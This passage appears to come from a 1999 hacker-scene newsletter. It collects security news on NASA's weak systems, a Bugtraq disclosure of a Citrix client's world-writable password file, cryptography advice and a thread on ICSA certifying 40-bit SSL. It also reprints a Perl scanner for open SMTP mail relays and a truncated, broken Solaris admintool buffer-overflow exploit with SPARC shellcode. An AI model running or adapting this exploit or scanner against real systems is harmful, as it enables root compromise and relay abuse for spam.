-> Dr. Enrique Daltabuit
   Centro Tecnologico, ENEP-Aragon, UNAM
-> M. en C. Diego Zamboni
   CERIAS, Purdue University
-> Nicholas P. Cardo
   Lawrence Berkeley National Laboratory
   Computational Systems Group

...............
Submissions
...............

Presentations can be delivered using the following means:

o E-mail (disc99@asc.unam.mx)
o Post mail to the following address:
  Área de Seguridad en Cómputo
  Dirección General de Cómputo Académico
  Circuito Exterior, Ciudad Universitaria
  04510 México, D.F.
  MEXICO

<>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>
Further Information
-------------------

E-mail    : disc99@asc.unam.mx
WWW       : http://www.asc.unam.mx/disc99-i/convocatoria.html
Address   : Área de Seguridad en Cómputo
            Dirección General de Cómputo Académico
            Circuito Exterior, Ciudad Universitaria
            04510 Mexico, D.F.
            MEXICO
Telephone Number : (52-5) 622 81 69 and (52-5) 685 22 29
Fax       : (52 5) 6 22 80 43
Subject   : DISC 99

<>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>

@HWA

39.0 [ISN] GAO: NASA systems full of holes.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 27 May 1999 02:56:28 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] GAO: NASA systems full of holes.

From: anon

http://www.fcw.com/pubs/fcw/1999/0524/fcw-newsnasa-5-24-99.html

MAY 24, 1999

GAO: NASA systems full of holes

BY DIANE FRANK (diane_frank@fcw.com)

Out-of-date information security policies have left significant vulnerabilities in NASA's mission-critical systems that could allow unauthorized users to steal, modify or delete important operational data, according to a General Accounting Office report released last week.

GAO, working over the past year with experts from the National Security Agency and using nothing more than public Internet access, was able to gain access to several unclassified mission-critical systems, including those supporting the command and control of spacecraft.

According to GAO, NASA has not created enough awareness among its employees about common security mistakes and vulnerabilities, such as easily guessed passwords. NSA initially breached some systems using passwords such as "guest" for guest accounts and "adm" for system administrators, opening the door for broader access to agency systems.
"The way we got in was through commonly known security faults," said John de Ferrari, assistant director of the Accounting and Information Management Division at GAO.

GAO concluded that it was able to penetrate systems because NASA does not have a consistent information security management policy that the entire agency follows. "A lot of what needs to be done is awareness-related; you never seem to get enough awareness of computer security," de Ferrari said.

GAO found that NASA did not have many policies regarding Internet and network security, and some policies the agency did have were out of date or were not followed.

"We Had Become Quite Lax"

"The fact of the matter is, we had become quite lax in the agency in terms of passwords," said Lee Holcomb, NASA's chief information officer. NASA now is scanning user passwords for ones that could be easily cracked and to check new passwords for vulnerabilities.

"We take very seriously our responsibility for safeguarding our IT assets, and after Y2K, security is our No. 1 priority," Holcomb said. "They acknowledge that they did not succeed in penetrating several systems, but the fact that they did succeed is troubling to us. It is a wake-up call to the agency."

This report is an important addition to the work already occurring throughout government to raise awareness of security needs, said Paul Rodgers, senior executive at the Critical Infrastructure Assurance Office, which is leading the national effort to protect critical systems. "The dangers are increasing, and we think the GAO report delivers an important message to NASA and other agencies," Rodgers said.

The GAO/NSA team could not penetrate certain pockets of NASA's systems because network administrators either carefully controlled system access privileges or used patches for known operating system flaws.
If expanded to the whole agency, such simple fixes could protect systems better because hackers usually will move on to systems with easily exploitable weaknesses, de Ferrari said.

@HWA

39.1 [ISN] Nasa vulnerabilities potentially deadly
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 28 May 1999 01:12:31 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] NASA Vulnerabilities Are Potentially Deadly

http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html

NASA Leakage -- Deadly Leakage
By MIKE HUDACK

135 out of 155 NASA computer systems were found vulnerable by NSA hackers, reported the General Accounting Office. The GAO, however, didn't say what was contained on those systems -- they simply called them "mission critical." The fact is, however, that there's a lot more to these systems than NASA missions.

"[Some NASA software has] the functionality of serving in the capacity of a munition's guidance system," said an anonymous source inside NASA. The weight of such a statement is quite obvious. "The software, however, would require a certain amount of modification and adaptation to accommodate the purpose [of nuclear weapons guidance]," the source continued.

The pattern is clear: earlier this year, the world learned of espionage at Department of Energy laboratories in which neutron bomb technology was stolen. At this point, there is no evidence that guidance technology from NASA computers has been stolen. The fact remains, however, that China has a dedicated force of computer hackers who do nothing but probe US Government computers. Their missing NASA would be extraordinarily unlikely.

The most damning evidence, reported by two anonymous NASA employees, states that NASA has known about security holes in its Information Technology facilities for more than a year.
According to them, "Security has consistently been reduced to a reactive role in every part of the agency. [IT] which has long been identified as vulnerable is not prohibited." In fact, one went so far as to suggest that it would take a fundamental change of NASA leadership to create any true security at the Agency.

Continued at:
http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html

@HWA

40.0 Citrix Winframe client for Linux vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 28 May 1999 12:26:59 -0700
From: David Terrell
To: BUGTRAQ@netspace.org
Subject: Citrix Winframe client for Linux

[ presumably this holds true for the other unix clients as well, but all I have is linux to test on ]

The Citrix Winframe linux client (used for accessing Winframe and Windows NT Server Terminal Edition) has a simple configuration section. Perhaps too simple....

All configuration information is stored in a directory /usr/lib/ICAClient/config which is mode 777. This in and of itself is bad news, since any user on the system can overwrite configuration data.

The situation is actually much worse than that. When you start up the actual session manager (wfcmgr) you get a listbox of configured sessions. The data for this listbox is stored in the mode 777 file /usr/lib/ICAClient/config/appsrv.ini. So there's a single config file shared between all users. A sample session profile follows:

[WFClient]
Version=1

[ApplicationServers]
broken=

[broken]
WinStationDriver=ICA 3.0
TransportDriver=TCP/IP
DesiredColor=2
Password=0006f6c601930785
Domain=NTDOM
Username=user
Address=hostname

Yep. Passwords are stored in some kind of hash. What that hash is doesn't really matter since you can just bring up wfcmgr and log in as that user. Terrible.
I tried mailing both support@citrix.com and security@citrix.com but neither of these addresses exist.

Workaround? wfcmgr supports the -icaroot parameter, but you basically need to copy all the files in for it to work. So duplicate the tree in your home directory, fix permissions, and do wfcmgr -icaroot $HOME/.ica. Alternatively, don't use it.

Distressing that the company that was "bringing multiuser concurrent logons to Windows NT" makes such a little effort at understanding multiuser security....

[further editorialization left to the reader]

--
David Terrell            dbt@meat.net, dbt@nebcorp.com
I may or may not be speaking for Nebcorp,    http://wwn.nebcorp.com/~dbt/
but Nebcorp has spoken for you.

@HWA

41.0 [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 28 May 1999 20:16:42 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
Message-ID:

[Very good run-down on what isn't acceptable crypto. - Jay]

Forwarded From: "Jay D. Dyson"
Originally From: "Arnold G. Reinhold"
Courtesy of Cryptography List.

At 1:36 PM -0400 5/27/99, Kawika Daguio wrote:

What I would like to know from you is whether you and others have been able to construct a "duh" list of typical, but unacceptable current practices that can easily be remediated.

Here are my top 10 candidates for a "duh" list:

1. Keys that are too short: Anything less than 80 bits for symmetric ciphers (128 bits preferred), or 1024 bits for integer-based public key systems. In particular this precludes use of 56-bit DES. (112-bit 3DES is fine.)

2. Poor quality random number generation. Random quantities are needed at many places in the operation of a modern cryptographic security system. If the source of randomness is weak, the entire system can be compromised.

3. Use of short passwords or weak passphrases to protect private keys or, worse, using them to generate symmetric keys.
Bad passphrase advice abounds. For example, both Netscape and Microsoft advise using short passwords to protect private keys stored by their browsers. The simple fix is to use randomly generated passphrases of sufficient length. See http://www.hayom.com/diceware.html.

4. Re-use of the same key with a stream cipher. I have seen this done many times with RC4. Even Microsoft appears to have gotten this wrong with their VPN (I do not know if it has been fixed). There are simple techniques to avoid this problem but they are often ignored. See http://ciphersaber.gurus.com for one method. The potential for slipping up in stream cipher implementation makes a strong case for using modern block ciphers wherever possible.

5. Using systems based on encryption techniques that have not been publicly disclosed and reviewed. There are more than enough ciphers and public key systems out there that have undergone public scrutiny. Many of the best are now in the public domain: 3DES, Blowfish, Skipjack, Arcfour, D-H, DSA. Others, e.g. RSA, IDEA can be licensed.

6. Ignoring physical security requirements for high value keys. In particular, no secret key is safe if it is used on a personal computer to which someone who is not trusted can gain physical access.

7. Lack of thorough configuration management for cryptographic software. The best software in the world won't protect you if you cannot guarantee that the version you approved is the version being executed.

8. Poor human interface design. Cryptographic systems that are too hard to use will be ignored, sabotaged or bypassed. Training helps, but cannot overcome a bad design.

9. Failure to motivate key employees. Action or inaction, deliberate or inadvertent, by trusted individuals can render any security system worse than worthless. David Kahn once commented that no nation's communications are safe as long as their code clerks are at the bottom of the pay scale.

10. Listening to salesmen.
Any company that is selling cryptographic products has a good story for why the holes in their product really do not matter. Make sure the system you deploy is reviewed by independent experts.

Arnold Reinhold

@HWA

42.0 Seeing invisible fields and avoiding them...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Twstdpair (Source: MSNBC)

See invisible fields - and avoid them
The Micro Alert Alarm for detecting radio/microwaves

May 28 - Earlier this week, a news story I read troubled me greatly. It told about a European study that linked cellular phone use to an increased incidence of brain tumors. For me, and millions of other cell phone junkies, this is a very scary thought. If the study is true, I could stop using my phones to minimize risks, or find out just how much "pollution" my devices are creating.

THAT'S WHERE THE PEOPLE from AlphaLab Inc. come in. Someone there read a column I did on a cell phone antenna add-on that claimed to take the signal and move it away from your head. AlphaLab's David told me the company made a tiny device that could detect what your phone was really doing. I jumped at the chance to play with one.

The Micro Alert Alarm is just what it says it is. It's a matchbox-sized device (2.25 inches by 1.6 inches by 0.75 inches) that will (and I quote) "find what's emitting radio or microwaves, whether in hidden locations or in plain sight." The alarm puts forth a loud (annoying) beep when radio waves stronger than the level you select are present. If you move closer to the source of the RF-emitting device, the beeps will ultimately become a solid tone (more annoying). As you move away from the source, the beeping will stop altogether (thankfully).

The alarm runs on a tiny battery that lasts three years or so. At its highest sensitivity, it should detect a typical cellular phone tower a half-mile away.
Or an analog cellular phone 40 feet away. Or a digital phone at 20 feet. Or a microwave oven that's in use 10 to 50 feet away. To send the Micro Alert Alarm into nearly constant fits, unscrew the back and open one side. The sensitivity goes off the chart. In that mode, you can see if someone has bugged a room (among other things). The price for this little marvel? $81.50, plus shipping and handling.

Does it work? You bet. Actually, sometimes it works too well. The most important part of working this device is setting it to your location. It can be very sensitive.

I really couldn't test it at MSNBC. Way too many TV monitors, computer monitors and all sorts of broadcasting stuff around. And I couldn't really test it at home in Lower Manhattan. An old friend, Joe Sand, while helping me install an antenna on my roof, told me I lived so close to the broadcast antennas on the World Trade Center, that if someone made sunglasses that detected radio waves, it would look as if I lived inside a tornado. He was right. The alarm was nearly impossible to adjust at the "normal" setting. And it never stopped beeping when set on "high" sensitivity.

I did have better luck out at the Eastern Long Island test center. There I was able to adjust everything to my liking. I found that the Micro Alert Alarm didn't like microwave ovens or TV sets or computer monitors - all from a few feet away. Cellular phones (one-third-watt output) set off the beeping from about three to five feet away and my Blackberry beeper (2 watts of transmitting power) did the same from about one to two feet away. Not what AlphaLab claims, but who knows if I ever really maximized all the settings.

Is it worth it? That depends. If you're the paranoid type, buy one today. I couldn't reference just how scientifically accurate it is, but under favorable conditions it did detect those invisible radio waves that could be dangerous to our health. Might turn out to be a good gift for someone with a pacemaker.
On the other hand, a Micro Alert Alarm is said to find surveillance "bugs," detect police radar, leaky microwave ovens, fluorescent lighting, electric typewriters and copy machines!

Finally, you can take AlphaLab's advice and switch on your Micro Alert Alarm and put it in your pocket when you go out. If someone switches on a cell phone and sets off your alarm, you can kindly ask them to move away and stop polluting your personal space. Cool!

@HWA

43.0 RelayCheck v1.0 scan for smtp servers that will relay mail.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml

#!/usr/bin/perl
##############################################
#                                            #
# RelayCheck v1.0                            #
# Written By: Epicurus (epicurus@wilter.com) #
#                                            #
# Purpose: To scan a list of SMTP servers to #
# find servers that will relay e-mail. There #
# are many reasons why one might need such a #
# list of SMTP servers.                      #
#                                            #
# Usage:                                     #
# Create a list of hosts which you want to   #
# scan. One host per line. Then run this     #
# script.                                    #
#                                            #
##############################################

use Socket;

print "RelayCheck v1.0\n";
print "Written By: Epicurus (epicurus\@wilter.com)\n\n";

# Interactive setup: host list file, HELO name and the envelope
# addresses used for the relay test.
print "Host List: ";
chomp($host_list=<STDIN>);
print "HELO Domain: ";
chomp($helo_domain=<STDIN>);
print "Attempt From: ";
chomp($from=<STDIN>);
print "Attempt To: ";
chomp($to=<STDIN>);
print "Log Session?(y/n)";
$yn=<STDIN>;
if($yn =~ /y/i) {
    $log = 1;
    $logfile="relay.log";
    print "Log File [$logfile]: ";
    $file=<STDIN>;
    chop($file) if $file =~ /\n$/;
    if($file ne "") {
        $logfile=$file;
    }
    open(LOG,">>$logfile") || die("Unable to write to $logfile!");
    print LOG "RelayCheck Scan:\n\n";
}

##############################################

$helo_string = "HELO $helo_domain\r\n";
$mail_from = "MAIL FROM: <$from>\r\n";
$rcpt_to = "RCPT TO: <$to>\r\n";
$port = 25;
$found=0;
$i=0;

# One host per line in the host list file.
open(HOSTS,"$host_list") || die $!;
while(<HOSTS>) {
    chop($_) if $_ =~ /\n$/;
    $remote=$_;
    # Pad the host name with dots so the results line up in columns.
    $print_remote = $remote;
    $print_remote .= "." while(length($print_remote) < 38);
    $print_remote .= ": ";
    print "$print_remote";
    print LOG "$print_remote" if($log==1);
    &send_mail;
    $i++;
}
close(HOSTS);

print "\nFinished Scanning. $found out of $i hosts will relay.\n\n";
print LOG "\nFinished Scanning. $found out of $i hosts will relay.\n\n" if($log==1);
close(LOG) if($log==1);

# Walk the SMTP dialogue up to RCPT TO; a 250 reply to RCPT TO for a
# non-local recipient means the server accepted the relay.
sub send_mail {
    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
    die("No port specified.") unless $port;
    $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
    $paddr = sockaddr_in($port, $iaddr);
    $proto = getprotobyname('tcp');
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
    # An unreachable host should not abort the whole scan.
    unless (connect(SOCK, $paddr)) {
        print "unable to connect: $!\n";
        print LOG "unable to connect: $!\n" if($log==1);
        close(SOCK);
        return;
    }
    $smtp=<SOCK>;
    if($smtp =~ /^220 /) { send(SOCK,$helo_string,0); }
    $smtp=<SOCK>;
    if($smtp =~ /^250 /) { send(SOCK,$mail_from,0); }
    $smtp=<SOCK>;
    if($smtp =~ /^250 /) { send(SOCK,$rcpt_to,0); }
    $smtp=<SOCK>;
    if($smtp =~ /^250 /) {
        $found++;
        print "relaying allowed\n";
        print LOG "relaying allowed\n" if($log==1);
    } else {
        print "no relaying\n";
        print LOG "no relaying\n" if($log==1);
    }
    send(SOCK,"QUIT\r\n",0);
    close(SOCK);
}

@HWA

44.0 Admintool exploit for Solaris (Updated) by Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml

/*=============================================================================
   admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition)

   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)

   [usage]
   % setenv DISPLAY=yourdisplay:0.0
   % gcc ex_admintool.c (This example program)
   % a.out
   ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk] -> Directory: /tmp -> [Ok] )
   # In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include
#include

#define ADJUST1   2
#define ADJUST2   1
#define BUFSIZE1  1000
#define BUFSIZE2  800
#define OFFSET    3600
#define OFFSET2   400
#define PKGDIR    "mkdir /tmp/EXP"
#define PKGINFO   "/tmp/EXP/pkginfo"
#define PKGMAP    "/tmp/EXP/pkgmap"
#define NOP       0xa61cc013

char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i,vofs=0;
struct utsname name;

main()
{
    uname(&name);
    if (strcmp(name.release,"5.7")==0) vofs=-904;
    system(PKGDIR);
    putenv("LANG=");
    if ((fp=fopen(PKGMAP,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGMAP);
        exit(1);
    }
    fclose(fp);
    if ((fp=fopen(PKGINFO,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGINFO);
        exit(1);
    }
    fprintf(fp,"PKG=");
    ret_adr=get_sp()-OFFSET+vofs;
    while ((ret_adr & 0xff000000) == 0 ||
           (ret_adr & 0x00ff0000) == 0 ||
           (ret_adr & 0x0000ff00) == 0 ||
           (ret_adr & 0x000000ff) == 0)
        ret_adr += 4;
    printf("Jumping address = %lx\n",ret_adr);
    memset(x,'a',4);
    for (i = ADJUST1; i < 1000; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >>8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE1]=0;
    fputs(x,fp);
    fprintf(fp,"\n");
    fprintf(fp,"NAME=");
    memset(x,'a',4);
    for (i = ADJUST2; i < BUFSIZE2; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0; i

To: BUGTRAQ@netspace.org
Subject: ICSA certifies weak crypto as secure

I am becoming concerned about the apparent lack of professional competence within even well-known segments of the security community.
I hope the incident I discovered is an isolated one, but even a single such incident is disquieting.

There is a site that offers credit reports to consumers called ConsumerInfo.com.

https://www.consumerinfo.com

The site owner seems to have tried to do everything right. They joined TrustE. They had their site certified by ICSA. They clearly have given security a serious thought.

But the company and all its customers were severely let down by ICSA, since the highly confidential information submitted by the user to the site is insufficiently "secured" by 40bit TLS. And it is not as if using 128 bit would have been a challenge. The site uses IIS and is located in the US. (Not that deploying 40 bit crypto would be acceptable even outside the US).

I find it frightening to think that somebody calling themselves a security professional might even consider certifying a site using 40bit SSL to protect crucial customer information. Especially a site in the financial sector. Certifying obfuscation as security is an unacceptable level of performance by any computer security professional.

I would like to be able to blame simple ignorance of crypto for this deed, which alone would be bad enough coming from a security "professional", but I am afraid that's not possible since it is inconceivable that the certifying ICSA member was unaware that 128 bit TLS/SSL is industry standard. Instead, we must assume that for reasons unknown, but ultimately irrelevant, a certification was issued for technology the issuer knew to not afford the customer security or simply didn't bother to check the crypto strength.

Either way this condemns ICSA (a member of the Gartner Group), and reflects very badly on our industry as a whole.
--Lucky Green PGP 5.x encrypted email preferred ---------------------------------------------------------------------------- From: Peter Gutmann To: BUGTRAQ@netspace.org Subject: Re: ICSA certifies weak crypto as secure "Lucky Green" writes: >I am becoming concerned about the apparent lack of professional competence >within even well-known segments of the security community. I hope the >incident I discovered is an isolated one, but even a single such incident is >disquieting. [...] >I find it frightening to think that somebody calling themselves a security >professional might even consider certifying a site using 40bit SSL to >protect crucial customer information. Especially a site in the financial >sector. Certifying obfuscation as security is an unacceptable level of >performance by any computer security professional. I think it's pretty common, in 1997 I heard of Ernst and Young in NZ certifying 40-bit SSL as being secure for banking use. I mentioned this in a posting to sci.crypt titled "Crypto for beancounters" and got several responses from people saying they'd had similar experiences (not necessarily with E&Y, but with Big 6 firms who did security audits). The summary of the responses was: -- Snip -- [...] - Getting a security system accepted is more likely if it's been reviewed by the company auditors, even if the people involved don't have much experience with the technology. - Even if the auditors don't have much crypto experience, they're generally very good at finding things like procedural flaws. Most real systems fail because they're not used properly, not because of technical attacks. Accountants/auditing firms are very good at finding problems like this. - Some firms may have experience in auditing crypto, but more importantly they should be able to call in outside experts to check the crypto. Requiring that the audit report include details of how the crypto was evaluated and (if external experts were used) by who would be a good idea. 
In summary use the auditing firm to cover security procedures, but (unless they have expertise in the area) leave assessment of the crypto software to known experts in the field and/or insist on seeing details of how the crypto was assessed.

-- Snip --

It's really just an issue of being able to prove due diligence - all you need is the right people to check the "Uses encryption" box and you're OK. Whether the encryption is any good or not is largely irrelevant, at least for the purposes of the exercise, which is to pass the audit.

Peter.

----------------------------------------------------------------------------

Date: Thu, 27 May 1999 16:14:17 -0400
From: Jon McCown
To: BUGTRAQ@netspace.org
Subject: ICSA - Certified Sites and Criteria Issues

-----BEGIN PGP SIGNED MESSAGE-----

While I am constrained by NDAs from discussing the specific issues of any particular ICSA customer's security issues or policy, I will respond "in general" to Lucky Green's posting regarding the use of 40-bit cryptography as part of an ICSA certified configuration.

Participants in our site certification program (TruSecure) are required to meet in excess of 200 criteria elements; covering such issues as physical security, business continuity, personnel management, network architecture, patches and updates, privacy, and sensitive information handling. Nearly all of the criteria elements are driven by the customer's security and operational policy-- which is derived from their business objectives and risk management approach.

The 'specific' criteria elements which govern the use of cryptography in the context of the customer site are (verbatim):

HUF0007: The handling procedures, security measures, and classifications for sensitive information are documented in a Sensitive Data Policy. The procedures identified in the policy are in place.
HUF0014: The site's Internet Security Policy, as documented on form TS012.01 - Security Posture and Policy, has been implemented
HUF0027: If client data is gathered by the target, then the site must publish online its site visitor privacy, and user data security policies.
SVC0034: Sensitive Information, as identified in HUF0007 is encrypted and uses protocols which are acceptable to both the host and user.
[in this context the "host" is the site operator and the "user" is their client base]

In this context it _is_ possible for a customer to mandate (via their own policy) use of whatever levels of cryptography they view as being appropriate to their business model and customer requirements. For example, if a customer policy specifies 128-bit TLS, client-certificates, and token-based auth-- they will be validated at that level. And if validating the server's identity to the end-user, or no-hassle compatibility with zillions of consumers' bargain-club-PC 40-bit browsers is a goal-- a different policy might well result.

Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit encryption have become low-hanging-fruit on the confidentiality tree. The Gilmore/EFF demonstrations and recent IETF SAG discussions have put that writing on the wall. Do we need to add an "appropriate crypto strength" element to the TruSecure criteria? Yes I guess we do.
- - Jon McCown, ICSA Labs -----BEGIN PGP SIGNATURE----- Version: PGP 5.5.5 iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI 77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D Ox4VuVRLLCo= =Mkwn -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- Date: Thu, 27 May 1999 16:06:17 -0700 From: Lucky Green To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues > From: Jon McCown [mailto:jmccown@icsa.net] > In this context _is_ possible for a customer to mandate (via their > own policy) use of whatever levels of cryptography they view as being > appropriate to their business model and customer requirements. For > example, if a customer policy specifies 128-bit TLS, > client-certificates, and token-based auth-- they will be validated at > that level. And if validating the server's identity to the end-user, > or no-hassle compatibility with zillions of consumers' bargain-club-PC > 40-bit browsers is a goal-- a different policy might well result. Now I am really getting worried. From your post it is clear that you, a representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a server you by no means prevent users limited to 40 bit crypto from accessing it. Sure, a server can be specifically configured to not allow access by 40 bit browsers, but the overwhelming majority of 128 bit capable websites support both 128 and 40 bit crypto and will automatically use the highest strength supported by the browser. No incompatibility issues are introduced by enabling full-strength crypto. The site certified by ICSA did not support 128 bit crypto even to browsers that support it. Which is, IMHO, unacceptable for a site that had their security checked by an audit. 
--Lucky

----------------------------------------------------------------------------

Date: Thu, 27 May 1999 19:23:19 -0400
From: Russ
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues

If ICSA is "constrained by NDAs from discussing the specific issues of any particular ICSA customer's security issues or policy" and "Nearly all of the criteria elements are driven by the customer's security and operational policy-- which is derived from their business objectives and risk management approach." and you say "Do we need to add an "appropriate crypto strength" element to the TruSecure criteria? Yes I guess we do." then what, pray tell, should a consumer visiting

https://www.consumerinfo.com/n/security.htm?htm+l

glean from the fact that the page linked on their site from your ICSA icon contains the following;

"ConsumerInfo.Com employs sophisticated encryption"

and further states;

"In addition to employing these high-security measures, ConsumerInfo.Com has undergone the rigorous certification process for the International Computer Security Association's (ICSA) Web Certification program. This process examined every aspect of our security precautions, encompassing an on-site inspection of our facility for physical security and policy plus a remote assessment of our potential vulnerabilities to web-based attacks. In addition, the ICSA's certification is a continuous process, repeated several times during the year and renewed annually, so you know ConsumerInfo.Com's security measures are state-of-the-art."

However, the bottom line is that;

- They are *NOT* employing "sophisticated encryption", they're employing the least sophisticated deployable.

- They also say ICSA "examined every aspect of our security precautions", but in fact, you only examined those aspects defined in their policies.

- They also claim that because of your certification, their customers "know ConsumerInfo.Com's security measures are state-of-the-art" when in fact they're *NOT*.
I will not, at this time, question the integrity of ICSA. Nor will I suggest that ConsumerInfo.Com is out and out lying.

I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com to mislead their customers via the ICSA Web Certification approval. By ICSA not being permitted, by NDA, to discuss certification they have performed, it renders, IMNSHO, the certification itself *worthless*. It would appear that ConsumerInfo.Com has been allowed to say anything they want about their work with ICSA and, by NDA, ICSA cannot rebuke it.

ICSA Web Certification reports should be public, or, not trusted.

Cheers,
Russ - NTBugtraq Editor

----------------------------------------------------------------------------

Date: Thu, 27 May 1999 18:46:47 -0400
From: Adam Shostack
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues

You can ISO9001 certify the process of shooting yourself in the foot, so long as the process is documented and reliably produces the proper result.

Do you require certified sites post their security policy? If not, how do I know that the policy doesn't explicitly accept the presence of phf in /cgi-bin? Would it be possible to have that in my policy and still get certified, if I have good business reasons for putting it in place?

This flap may be a result of certifying compliance to policy, but the relying parties on your mark should not be expected to be able to read and understand those policies; they should be able to rely on your mark to say that the policies make sense. Incidentally, do you require sites to post these policies to which you certify compliance?

I think that the high level message here (and from the TRUSTe/Microsoft crap) is that what organizations like ICSA and Truste are certifying is not what people who may be expected to rely on those marks expect is being certified.
Adam On Thu, May 27, 1999 at 04:14:17PM -0400, Jon McCown wrote: | -----BEGIN PGP SIGNED MESSAGE----- | | While I am constrained by NDAs from discussing the specific issues of | any particular ICSA customer's security issues or policy, I will | respond "in general" to Lucky Green's posting regarding the use of | 40-bit cryptography as part of an ICSA certified configuration. | | Participants in our site certification program (TruSecure) are | required to meet in excess 200 criteria elements; covering such issues | as physical security, business continuity, personnel management, | network architecture, patches and updates, privacy, and sensitive | information handling. Nearly all of the criteria elements are | driven by the customer's security and operational policy-- which is | derived from their business objectives and risk management approach. | | The 'specific' criteria elements which govern the use of cryptography | in the context of the customer site are (verbatim): | | HUF0007: The handling procedures, security measures, and | classifications for sensitive information are documented in a | Sensitive Data Policy. The procedures identified in the policy are | in place. | HUF0014: The site's Internet Security Policy, as documented on form | TS012.01 - Security Posture and Policy, has been implemented | HUF0027: If client data is gathered by the target, then the site | must publish online its site visitor privacy, and user data security | policies. | SVC0034: Sensitive Information, as identified in HUF0007 is | encrypted and uses protocols which are acceptable to both the host and | user. | [in this context the "host" is the site operator and the "user" is | their client base] | | In this context _is_ possible for a customer to mandate (via their | own policy) use of whatever levels of cryptography they view as being | appropriate to their business model and customer requirements. 
For | example, if a customer policy specifies 128-bit TLS, | client-certificates, and token-based auth-- they will be validated at | that level. And if validating the server's identity to the end-user, | or no-hassle compatibility with zillions of consumers' bargain-club-PC | 40-bit browsers is a goal-- a different policy might well result. | | Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit | encryption have become low-hanging-fruit on the confidentiality tree. | The Gilmore/EFF demonstrations and recent IETF SAG discussions have | put that writing on the wall. Do we need to add an "appropriate | crypto strength" element to the TruSecure criteria? Yes I guess we | do. | | - - Jon McCown, ICSA Labs | | | | -----BEGIN PGP SIGNATURE----- | Version: PGP 5.5.5 | | iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI | 77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq | F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D | Ox4VuVRLLCo= | =Mkwn | -----END PGP SIGNATURE----- -- "It is seldom that liberty of any kind is lost all at once." -Hume ---------------------------------------------------------------------------- Date: Thu, 27 May 1999 15:44:47 -0700 From: David Schwartz To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues So does ICSA certification mean simply that a company has met its own requirements? (As opposed to some set of objectively validated or ICSA-imposed requirements?) DS > Participants in our site certification program (TruSecure) are > required to meet in excess 200 criteria elements; covering such issues > as physical security, business continuity, personnel management, > network architecture, 